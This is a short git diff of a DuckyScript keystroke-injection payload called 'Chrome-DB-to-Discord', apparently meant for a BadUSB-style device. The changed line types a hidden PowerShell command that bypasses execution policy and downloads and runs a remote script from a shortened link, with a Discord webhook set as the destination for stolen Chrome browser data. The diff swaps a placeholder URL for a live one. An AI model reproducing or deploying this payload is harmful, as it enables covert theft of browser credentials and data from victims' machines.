diff --git a/Chrome-DB-to-Discord/Chrome-DB-to-Discord.txt b/Chrome-DB-to-Discord/Chrome-DB-to-Discord.txt index f725922..c9d361d 100644 --- a/Chrome-DB-to-Discord/Chrome-DB-to-Discord.txt +++ b/Chrome-DB-to-Discord/Chrome-DB-to-Discord.txt @@ -13,7 +13,7 @@ REM open powershell (remove "-W H" to show the window) DELAY 1000 GUI r DELAY 750 -STRING powershell -NoP -Ep Bypass -W H -C $dc = 'YOUR_WEBHOOK_HERE' ; irm URL | iex +STRING powershell -NoP -Ep Bypass -W H -C $dc = 'YOUR_WEBHOOK_HERE' ; irm is.gd/bwchdbdc | iex ENTER